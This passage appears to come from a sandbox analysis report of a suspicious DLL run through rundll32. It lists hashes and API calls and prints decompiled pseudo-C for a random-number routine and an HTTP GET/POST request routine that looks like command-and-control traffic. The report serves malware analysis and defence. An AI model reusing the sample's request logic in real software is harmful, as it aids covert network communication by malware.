                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                                                                • String ID: FALSE$TRUE
                                                                                                                                                                                                                • API String ID: 1290676130-1412513891
                                                                                                                                                                                                                • Opcode ID: 1ca1a3504ed0376f267886d94587d7e8d7815c7b98ce9207ac68ce592b44425b
                                                                                                                                                                                                                • Instruction ID: 0fc0e3d576d83403318f50b99c476987941cb1918b05b8b85936d2293dab87e0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ca1a3504ed0376f267886d94587d7e8d7815c7b98ce9207ac68ce592b44425b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44E17D75E00219AFEB05DFE4C885EAEBBB9FF49380F108159E505B7299DB31AE41CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 30%
                                                                                                                                                                                                                			E10013B62(intOrPtr* _a4) {
                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                				_Unknown_base(*)()* _t15;
                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                				intOrPtr* _t25;
                                                                                                                                                                                                                				intOrPtr* _t29;
                                                                                                                                                                                                                				struct HINSTANCE__* _t30;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                                                                                                                                                                				if(_t30 == 0) {
                                                                                                                                                                                                                					L7:
                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                                                                                                                                                                				if(_t25 == 0) {
                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                                                                                                                                                                				_v12 = _t15;
                                                                                                                                                                                                                				if(_t15 == 0) {
                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                                                                                                                                                                				if(_t29 == 0) {
                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_push(0xf0000000);
                                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                				_push( &_v8);
                                                                                                                                                                                                                				if( *_t25() == 0) {
                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t20 = _v12(_v8, 4,  &_v16);
                                                                                                                                                                                                                				 *_t29(_v8, 0);
                                                                                                                                                                                                                				if(_t20 == 0) {
                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				 *_a4 = E10013ABD( &_v16);
                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                			}











                                                                                                                                                                                                                0x10013b68
                                                                                                                                                                                                                0x10013b7a
                                                                                                                                                                                                                0x10013b7e
                                                                                                                                                                                                                0x10013bf2
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10013bf4
                                                                                                                                                                                                                0x10013b8e
                                                                                                                                                                                                                0x10013b92
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10013b9a
                                                                                                                                                                                                                0x10013b9c
                                                                                                                                                                                                                0x10013ba1
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10013bab
                                                                                                                                                                                                                0x10013baf
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10013bb1
                                                                                                                                                                                                                0x10013bb6
                                                                                                                                                                                                                0x10013bb8
                                                                                                                                                                                                                0x10013bba
                                                                                                                                                                                                                0x10013bbf
                                                                                                                                                                                                                0x10013bc4
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10013bcf
                                                                                                                                                                                                                0x10013bd9
                                                                                                                                                                                                                0x10013bdd
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10013bec
                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,10008511), ref: 10013B74
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 10013B8C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 10013B9A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 10013BA9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                • API String ID: 667068680-129414566
                                                                                                                                                                                                                • Opcode ID: ea4d4a06ababf097d1f427d636e20c623771a99ae6d7e2ce5fcd8467c9237de7
                                                                                                                                                                                                                • Instruction ID: bcf02c9419d9941f1c28ba2f8d3f55f4af3997818ec7d333a51f7a575932be52
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea4d4a06ababf097d1f427d636e20c623771a99ae6d7e2ce5fcd8467c9237de7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6711A53A90562AB7DB11DBA88C81F9EB7ECDF45750F118061FB00EF140EB70DE8546A4
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                			E1000F919(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                				int _v36;
                                                                                                                                                                                                                				signed int _v40;
                                                                                                                                                                                                                				intOrPtr _v44;
                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                				char _v60;
                                                                                                                                                                                                                				int _v72;
                                                                                                                                                                                                                				void* _v76;
                                                                                                                                                                                                                				intOrPtr _v96;
                                                                                                                                                                                                                				int _v100;
                                                                                                                                                                                                                				void* _v104;
                                                                                                                                                                                                                				intOrPtr _v108;
                                                                                                                                                                                                                				intOrPtr _v112;
                                                                                                                                                                                                                				char* _v116;
                                                                                                                                                                                                                				char _v120;
                                                                                                                                                                                                                				char _v136;
                                                                                                                                                                                                                				void _v396;
                                                                                                                                                                                                                				void _v652;
                                                                                                                                                                                                                				intOrPtr _t89;
                                                                                                                                                                                                                				intOrPtr _t92;
                                                                                                                                                                                                                				intOrPtr _t100;
                                                                                                                                                                                                                				intOrPtr* _t102;
                                                                                                                                                                                                                				intOrPtr _t107;
                                                                                                                                                                                                                				signed int _t108;
                                                                                                                                                                                                                				void* _t109;
                                                                                                                                                                                                                				intOrPtr _t110;
                                                                                                                                                                                                                				signed int _t111;
                                                                                                                                                                                                                				intOrPtr _t113;
                                                                                                                                                                                                                				char _t115;
                                                                                                                                                                                                                				intOrPtr _t120;
                                                                                                                                                                                                                				signed int _t122;
                                                                                                                                                                                                                				intOrPtr _t128;
                                                                                                                                                                                                                				intOrPtr _t132;
                                                                                                                                                                                                                				intOrPtr _t136;
                                                                                                                                                                                                                				intOrPtr _t138;
                                                                                                                                                                                                                				intOrPtr _t140;
                                                                                                                                                                                                                				char _t144;
                                                                                                                                                                                                                				intOrPtr _t146;
                                                                                                                                                                                                                				void* _t155;
                                                                                                                                                                                                                				signed int _t157;
                                                                                                                                                                                                                				void* _t161;
                                                                                                                                                                                                                				intOrPtr _t167;
                                                                                                                                                                                                                				intOrPtr _t172;
                                                                                                                                                                                                                				signed int _t173;
                                                                                                                                                                                                                				signed int _t182;
                                                                                                                                                                                                                				char _t186;
                                                                                                                                                                                                                				signed int _t187;
                                                                                                                                                                                                                				void* _t188;
                                                                                                                                                                                                                				signed int _t190;
                                                                                                                                                                                                                				signed int _t191;
                                                                                                                                                                                                                				char _t192;
                                                                                                                                                                                                                				void* _t193;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_v24 = __ecx;
                                                                                                                                                                                                                				_v36 = 0;
                                                                                                                                                                                                                				_v28 = 4;
                                                                                                                                                                                                                				_v32 = 1;
                                                                                                                                                                                                                				_t188 = __edx;
                                                                                                                                                                                                                				memset( &_v396, 0, 0x100);
                                                                                                                                                                                                                				memset( &_v652, 0, 0x100);
                                                                                                                                                                                                                				_v60 = E10009473(0x1232);
                                                                                                                                                                                                                				_t89 = E10009473(0xd24);
                                                                                                                                                                                                                				_t161 = 0x7d;
                                                                                                                                                                                                                				_v56 = _t89;
                                                                                                                                                                                                                				_v52 = E10009473(_t161);
                                                                                                                                                                                                                				_v48 = E10009473(0x14e);
                                                                                                                                                                                                                				_t92 = E10009473(0x580);
                                                                                                                                                                                                                				_v40 = _v40 & 0;
                                                                                                                                                                                                                				_t186 = 0x3c;
                                                                                                                                                                                                                				_v44 = _t92;
                                                                                                                                                                                                                				E100096BF( &_v120, 0, 0x100);
                                                                                                                                                                                                                				_v112 = 0x10;
                                                                                                                                                                                                                				_v116 =  &_v136;
                                                                                                                                                                                                                				_v120 = _t186;
                                                                                                                                                                                                                				_v104 =  &_v396;
                                                                                                                                                                                                                				_v100 = 0x100;
                                                                                                                                                                                                                				_v76 =  &_v652;
                                                                                                                                                                                                                				_push( &_v120);
                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                				_v72 = 0x100;
                                                                                                                                                                                                                				_push(E1000D389(_t188));
                                                                                                                                                                                                                				_t100 =  *0x10020d70; // 0x0
                                                                                                                                                                                                                				_push(_t188);
                                                                                                                                                                                                                				if( *((intOrPtr*)(_t100 + 0x28))() != 0) {
                                                                                                                                                                                                                					_t182 = 0;
                                                                                                                                                                                                                					__eflags = 0;
                                                                                                                                                                                                                					_v12 = 0;
                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                						_t102 =  *0x10020d70; // 0x0
                                                                                                                                                                                                                						_v8 = 0x8404f700;
                                                                                                                                                                                                                						_t187 =  *_t102( *0x10020e88,  *((intOrPtr*)(_t193 + _t182 * 4 - 0x20)), 0, 0, 0);
                                                                                                                                                                                                                						__eflags = _t187;
                                                                                                                                                                                                                						if(_t187 != 0) {
                                                                                                                                                                                                                							E1000F8B1(_t187);
                                                                                                                                                                                                                							_t107 =  *0x10020d70; // 0x0
                                                                                                                                                                                                                							_t108 =  *((intOrPtr*)(_t107 + 0x1c))(_t187,  &_v396, _v96, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                							__eflags = _a24;
                                                                                                                                                                                                                							_t157 = _t108;
                                                                                                                                                                                                                							if(_a24 != 0) {
                                                                                                                                                                                                                								E1000B983(_a24);
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							__eflags = _t157;
                                                                                                                                                                                                                							if(_t157 != 0) {
                                                                                                                                                                                                                								__eflags = _v108 - 4;
                                                                                                                                                                                                                								_t167 = 0x8484f700;
                                                                                                                                                                                                                								if(_v108 != 4) {
                                                                                                                                                                                                                									_t167 = _v8;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								__eflags = _v24 - 2;
                                                                                                                                                                                                                								_t109 = 0x1001e01c;
                                                                                                                                                                                                                								if(_v24 != 2) {
                                                                                                                                                                                                                									_t109 = 0x1001e024;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t110 =  *0x10020d70; // 0x0
                                                                                                                                                                                                                								_t111 =  *((intOrPtr*)(_t110 + 0x20))(_t157, _t109,  &_v652, 0, 0,  &_v60, _t167, 0);
                                                                                                                                                                                                                								__eflags = _a24;
                                                                                                                                                                                                                								_t190 = _t111;
                                                                                                                                                                                                                								_v8 = _t190;
                                                                                                                                                                                                                								if(_a24 != 0) {
                                                                                                                                                                                                                									E1000B983(_a24);
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								__eflags = _t190;
                                                                                                                                                                                                                								if(_t190 != 0) {
                                                                                                                                                                                                                									__eflags = _v108 - 4;
                                                                                                                                                                                                                									if(_v108 == 4) {
                                                                                                                                                                                                                										E1000F85F(_t190);
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									__eflags = _v24 - 2;
                                                                                                                                                                                                                									if(_v24 != 2) {
                                                                                                                                                                                                                										__eflags = 0;
                                                                                                                                                                                                                										_t113 =  *0x10020d70; // 0x0
                                                                                                                                                                                                                										_v8 =  *((intOrPtr*)(_t113 + 0x24))(_t190, 0, 0, 0, 0);
                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                										_t144 = E10009473(0xfe2);
                                                                                                                                                                                                                										_t192 = _t144;
                                                                                                                                                                                                                										_v16 = _t192;
                                                                                                                                                                                                                										_t146 =  *0x10020d70; // 0x0
                                                                                                                                                                                                                										_t190 = _v8;
                                                                                                                                                                                                                										_v8 =  *((intOrPtr*)(_t146 + 0x24))(_t190, _t192, E1000D389(_t192), _a4, _a8);
                                                                                                                                                                                                                										E1000A27E( &_v16);
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									__eflags = _a24;
                                                                                                                                                                                                                									if(_a24 != 0) {
                                                                                                                                                                                                                										E1000B983(_a24);
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									__eflags = _v8;
                                                                                                                                                                                                                									if(_v8 != 0) {
                                                                                                                                                                                                                										L31:
                                                                                                                                                                                                                										_t115 = 8;
                                                                                                                                                                                                                										_v28 = _t115;
                                                                                                                                                                                                                										_v20 = 0;
                                                                                                                                                                                                                										_v16 = 0;
                                                                                                                                                                                                                										E100096BF( &_v20, 0, _t115);
                                                                                                                                                                                                                										_t120 =  *0x10020d70; // 0x0
                                                                                                                                                                                                                										__eflags =  *((intOrPtr*)(_t120 + 0xc))(_t190, 0x13,  &_v20,  &_v28, 0);
                                                                                                                                                                                                                										if(__eflags != 0) {
                                                                                                                                                                                                                											_t122 = E1000B88D( &_v20, __eflags);
                                                                                                                                                                                                                											__eflags = _t122 - 0xc8;
                                                                                                                                                                                                                											if(_t122 == 0xc8) {
                                                                                                                                                                                                                												 *_a20 = _t190;
                                                                                                                                                                                                                												 *_a12 = _t187;
                                                                                                                                                                                                                												 *_a16 = _t157;
                                                                                                                                                                                                                												__eflags = 0;
                                                                                                                                                                                                                												return 0;
                                                                                                                                                                                                                											}
                                                                                                                                                                                                                											_v12 =  ~_t122;
                                                                                                                                                                                                                											L35:
                                                                                                                                                                                                                											_t128 =  *0x10020d70; // 0x0
                                                                                                                                                                                                                											 *((intOrPtr*)(_t128 + 8))(_t190);
                                                                                                                                                                                                                											_t191 = _v12;
                                                                                                                                                                                                                											L36:
                                                                                                                                                                                                                											__eflags = _t157;
                                                                                                                                                                                                                											if(_t157 != 0) {
                                                                                                                                                                                                                												_t132 =  *0x10020d70; // 0x0
                                                                                                                                                                                                                												 *((intOrPtr*)(_t132 + 8))(_t157);
                                                                                                                                                                                                                											}
                                                                                                                                                                                                                											__eflags = _t187;
                                                                                                                                                                                                                											if(_t187 != 0) {
                                                                                                                                                                                                                												_t172 =  *0x10020d70; // 0x0
                                                                                                                                                                                                                												 *((intOrPtr*)(_t172 + 8))(_t187);
                                                                                                                                                                                                                											}
                                                                                                                                                                                                                											return _t191;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                										GetLastError();
                                                                                                                                                                                                                										_v12 = 0xfffffff8;
                                                                                                                                                                                                                										goto L35;
                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                										GetLastError();
                                                                                                                                                                                                                										_t136 =  *0x10020d70; // 0x0
                                                                                                                                                                                                                										 *((intOrPtr*)(_t136 + 8))(_t190);
                                                                                                                                                                                                                										_t190 = 0;
                                                                                                                                                                                                                										__eflags = 0;
                                                                                                                                                                                                                										goto L26;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                									GetLastError();
                                                                                                                                                                                                                									L26:
                                                                                                                                                                                                                									_t138 =  *0x10020d70; // 0x0
                                                                                                                                                                                                                									 *((intOrPtr*)(_t138 + 8))(_t157);
                                                                                                                                                                                                                									_t157 = 0;
                                                                                                                                                                                                                									__eflags = 0;
                                                                                                                                                                                                                									goto L27;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								GetLastError();
                                                                                                                                                                                                                								L27:
                                                                                                                                                                                                                								_t140 =  *0x10020d70; // 0x0
                                                                                                                                                                                                                								 *((intOrPtr*)(_t140 + 8))(_t187);
                                                                                                                                                                                                                								_t187 = 0;
                                                                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                                                                								goto L28;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						GetLastError();
                                                                                                                                                                                                                						L28:
                                                                                                                                                                                                                						_t173 = _t190;
                                                                                                                                                                                                                						_t182 = _v12 + 1;
                                                                                                                                                                                                                						_v12 = _t182;
                                                                                                                                                                                                                						__eflags = _t182 - 2;
                                                                                                                                                                                                                					} while (_t182 < 2);
                                                                                                                                                                                                                					__eflags = _t173;
                                                                                                                                                                                                                					if(_t173 != 0) {
                                                                                                                                                                                                                						goto L31;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t191 = 0xfffffffe;
                                                                                                                                                                                                                					goto L36;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t155 = 0xfffffffc;
                                                                                                                                                                                                                				return _t155;
                                                                                                                                                                                                                			}































































                                                                                                                                                                                                                0x1000f927
                                                                                                                                                                                                                0x1000f92f
                                                                                                                                                                                                                0x1000f936
                                                                                                                                                                                                                0x1000f943
                                                                                                                                                                                                                0x1000f94b
                                                                                                                                                                                                                0x1000f94d
                                                                                                                                                                                                                0x1000f95e
                                                                                                                                                                                                                0x1000f975
                                                                                                                                                                                                                0x1000f978
                                                                                                                                                                                                                0x1000f97f
                                                                                                                                                                                                                0x1000f980
                                                                                                                                                                                                                0x1000f98b
                                                                                                                                                                                                                0x1000f998
                                                                                                                                                                                                                0x1000f99b
                                                                                                                                                                                                                0x1000f9a0
                                                                                                                                                                                                                0x1000f9a5
                                                                                                                                                                                                                0x1000f9a7
                                                                                                                                                                                                                0x1000f9af
                                                                                                                                                                                                                0x1000f9ba
                                                                                                                                                                                                                0x1000f9c1
                                                                                                                                                                                                                0x1000f9cd
                                                                                                                                                                                                                0x1000f9d0
                                                                                                                                                                                                                0x1000f9de
                                                                                                                                                                                                                0x1000f9e1
                                                                                                                                                                                                                0x1000f9e7
                                                                                                                                                                                                                0x1000f9e8
                                                                                                                                                                                                                0x1000f9ea
                                                                                                                                                                                                                0x1000f9f3
                                                                                                                                                                                                                0x1000f9f4
                                                                                                                                                                                                                0x1000f9f9
                                                                                                                                                                                                                0x1000f9ff
                                                                                                                                                                                                                0x1000fa09
                                                                                                                                                                                                                0x1000fa09
                                                                                                                                                                                                                0x1000fa0b
                                                                                                                                                                                                                0x1000fa10
                                                                                                                                                                                                                0x1000fa10
                                                                                                                                                                                                                0x1000fa1f
                                                                                                                                                                                                                0x1000fa2e
                                                                                                                                                                                                                0x1000fa30
                                                                                                                                                                                                                0x1000fa32
                                                                                                                                                                                                                0x1000fa41
                                                                                                                                                                                                                0x1000fa58
                                                                                                                                                                                                                0x1000fa5e
                                                                                                                                                                                                                0x1000fa61
                                                                                                                                                                                                                0x1000fa65
                                                                                                                                                                                                                0x1000fa67
                                                                                                                                                                                                                0x1000fa6c
                                                                                                                                                                                                                0x1000fa6c
                                                                                                                                                                                                                0x1000fa71
                                                                                                                                                                                                                0x1000fa73
                                                                                                                                                                                                                0x1000fa80
                                                                                                                                                                                                                0x1000fa84
                                                                                                                                                                                                                0x1000fa89
                                                                                                                                                                                                                0x1000fa8b
                                                                                                                                                                                                                0x1000fa8b
                                                                                                                                                                                                                0x1000fa8e
                                                                                                                                                                                                                0x1000fa92
                                                                                                                                                                                                                0x1000fa97
                                                                                                                                                                                                                0x1000fa99
                                                                                                                                                                                                                0x1000fa99
                                                                                                                                                                                                                0x1000fab0
                                                                                                                                                                                                                0x1000fab6
                                                                                                                                                                                                                0x1000fab9
                                                                                                                                                                                                                0x1000fabd
                                                                                                                                                                                                                0x1000fabf
                                                                                                                                                                                                                0x1000fac2
                                                                                                                                                                                                                0x1000fac7
                                                                                                                                                                                                                0x1000fac7
                                                                                                                                                                                                                0x1000facc
                                                                                                                                                                                                                0x1000face
                                                                                                                                                                                                                0x1000fadb
                                                                                                                                                                                                                0x1000fadf
                                                                                                                                                                                                                0x1000fae3
                                                                                                                                                                                                                0x1000fae3
                                                                                                                                                                                                                0x1000fae8
                                                                                                                                                                                                                0x1000faec
                                                                                                                                                                                                                0x1000fb25
                                                                                                                                                                                                                0x1000fb2b
                                                                                                                                                                                                                0x1000fb34
                                                                                                                                                                                                                0x1000faee
                                                                                                                                                                                                                0x1000faf3
                                                                                                                                                                                                                0x1000fafb
                                                                                                                                                                                                                0x1000fb00
                                                                                                                                                                                                                0x1000fb0b
                                                                                                                                                                                                                0x1000fb11
                                                                                                                                                                                                                0x1000fb1b
                                                                                                                                                                                                                0x1000fb1e
                                                                                                                                                                                                                0x1000fb1e
                                                                                                                                                                                                                0x1000fb37
                                                                                                                                                                                                                0x1000fb3b
                                                                                                                                                                                                                0x1000fb40
                                                                                                                                                                                                                0x1000fb40
                                                                                                                                                                                                                0x1000fb45
                                                                                                                                                                                                                0x1000fb49
                                                                                                                                                                                                                0x1000fb8f
                                                                                                                                                                                                                0x1000fb91
                                                                                                                                                                                                                0x1000fb94
                                                                                                                                                                                                                0x1000fb9c
                                                                                                                                                                                                                0x1000fba0
                                                                                                                                                                                                                0x1000fba3
                                                                                                                                                                                                                0x1000fbb5
                                                                                                                                                                                                                0x1000fbc0
                                                                                                                                                                                                                0x1000fbc2
                                                                                                                                                                                                                0x1000fbd6
                                                                                                                                                                                                                0x1000fbdb
                                                                                                                                                                                                                0x1000fbe0
                                                                                                                                                                                                                0x1000fc15
                                                                                                                                                                                                                0x1000fc1a
                                                                                                                                                                                                                0x1000fc1f
                                                                                                                                                                                                                0x1000fc21
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000fc21
                                                                                                                                                                                                                0x1000fbe4
                                                                                                                                                                                                                0x1000fbe7
                                                                                                                                                                                                                0x1000fbe7
                                                                                                                                                                                                                0x1000fbed
                                                                                                                                                                                                                0x1000fbf0
                                                                                                                                                                                                                0x1000fbf3
                                                                                                                                                                                                                0x1000fbf3
                                                                                                                                                                                                                0x1000fbf5
                                                                                                                                                                                                                0x1000fbf7
                                                                                                                                                                                                                0x1000fbfd
                                                                                                                                                                                                                0x1000fbfd
                                                                                                                                                                                                                0x1000fc00
                                                                                                                                                                                                                0x1000fc02
                                                                                                                                                                                                                0x1000fc04
                                                                                                                                                                                                                0x1000fc0b
                                                                                                                                                                                                                0x1000fc0b
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000fc0e
                                                                                                                                                                                                                0x1000fbc4
                                                                                                                                                                                                                0x1000fbca
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000fb4b
                                                                                                                                                                                                                0x1000fb4b
                                                                                                                                                                                                                0x1000fb51
                                                                                                                                                                                                                0x1000fb57
                                                                                                                                                                                                                0x1000fb5a
                                                                                                                                                                                                                0x1000fb5a
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000fb5a
                                                                                                                                                                                                                0x1000fad0
                                                                                                                                                                                                                0x1000fad0
                                                                                                                                                                                                                0x1000fb5c
                                                                                                                                                                                                                0x1000fb5c
                                                                                                                                                                                                                0x1000fb62
                                                                                                                                                                                                                0x1000fb65
                                                                                                                                                                                                                0x1000fb65
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000fb65
                                                                                                                                                                                                                0x1000fa75
                                                                                                                                                                                                                0x1000fa75
                                                                                                                                                                                                                0x1000fb67
                                                                                                                                                                                                                0x1000fb67
                                                                                                                                                                                                                0x1000fb6d
                                                                                                                                                                                                                0x1000fb70
                                                                                                                                                                                                                0x1000fb70
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000fb70
                                                                                                                                                                                                                0x1000fa73
                                                                                                                                                                                                                0x1000fa34
                                                                                                                                                                                                                0x1000fb72
                                                                                                                                                                                                                0x1000fb75
                                                                                                                                                                                                                0x1000fb77
                                                                                                                                                                                                                0x1000fb7a
                                                                                                                                                                                                                0x1000fb7d
                                                                                                                                                                                                                0x1000fb7d
                                                                                                                                                                                                                0x1000fb86
                                                                                                                                                                                                                0x1000fb88
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000fb8c
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000fb8c
                                                                                                                                                                                                                0x1000fa03
                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 1000F94D
                                                                                                                                                                                                                • memset.MSVCRT ref: 1000F95E
                                                                                                                                                                                                                  • Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000FA34
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$ErrorLast
                                                                                                                                                                                                                • String ID: GET$POST
                                                                                                                                                                                                                • API String ID: 2570506013-3192705859
                                                                                                                                                                                                                • Opcode ID: 5137b3a0b5685b47c74c298811dfd1042f56357df4ff912952738d4948db115f
                                                                                                                                                                                                                • Instruction ID: 60176bb3b918099171355f2e0455e639eaf927cb7297a2eeaffab32ddf1112b2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5137b3a0b5685b47c74c298811dfd1042f56357df4ff912952738d4948db115f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55A14DB1900618AFEB10DFA4CC84ABEBBF9FF49350F104069F905E72A1DB34AA41DB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
